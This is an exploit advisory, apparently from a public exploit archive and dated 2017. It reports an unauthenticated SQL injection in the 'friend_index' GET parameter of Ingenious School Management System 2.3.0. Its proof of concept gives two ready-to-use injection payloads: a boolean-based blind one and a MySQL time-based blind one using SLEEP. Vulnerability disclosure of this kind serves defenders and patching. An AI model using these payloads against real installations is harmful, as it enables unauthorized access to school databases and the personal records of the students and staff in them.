Ingenious School Management System 2.3.0 SQL Injection

Ingenious School Management System version 2.3.0 suffers from a remote SQL injection vulnerability.

MD5 | 0edcc3dcc71ecc83921e8b0f682a0862

# Exploit Title: Ingenious School Management System 2.3.0 - SQL injection
# Date: 01.11.2017
# Vendor Homepage:
# Software Link:
# Demo:
# Version: 2.3.0
# Category: Webapps
# Tested on: Kali Linux 2.0
# Exploit Author: Giulio Comi
# Contact: https://<>

This vulnerability allows an attacker to inject SQL commands (without authentication) in 'friend_index' GET parameter.

# Proof of Concept:


# Vulnerable Parameter: friend_index (GET)

Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: friend_type=Student&friend_index=1' AND 2576=2576 AND 'YJeg'='YJeg

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: friend_type=Student&friend_index=1' AND SLEEP(5) AND 'rliO'='rliO

Related Posts